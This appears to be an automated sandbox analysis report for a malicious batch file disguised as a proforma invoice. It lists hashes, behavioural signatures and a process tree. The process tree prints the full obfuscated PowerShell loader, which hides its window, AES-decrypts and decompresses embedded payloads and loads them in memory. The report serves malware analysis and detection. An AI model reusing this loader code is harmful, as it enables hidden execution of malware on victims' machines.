e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
24-07-2024 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

z1Proforma_invo.bat
Size

232KB
MD5

7ebd033260b1e54dff5afd7c6534cf33
SHA1

cfb7040938237156fa3795755c77eecd7957bc39
SHA256

e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
SHA512

18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f
SSDEEP

6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2736	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 2876	2692	cmd.exe	31
PID 2692 wrote to memory of 2876	2692	cmd.exe	31
PID 2692 wrote to memory of 2876	2692	cmd.exe	31
PID 2876 wrote to memory of 2740	2876	cmd.exe	33
PID 2876 wrote to memory of 2740	2876	cmd.exe	33
PID 2876 wrote to memory of 2740	2876	cmd.exe	33
PID 2876 wrote to memory of 2736	2876	cmd.exe	34
PID 2876 wrote to memory of 2736	2876	cmd.exe	34
PID 2876 wrote to memory of 2736	2876	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
    3⤵
    PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2736-4-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

Filesize
4KB

Download
memory/2736-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2736-6-0x00000000021E0000-0x00000000021E8000-memory.dmp

Filesize
32KB

Download
memory/2736-7-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-9-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-8-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-11-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-10-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-12-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download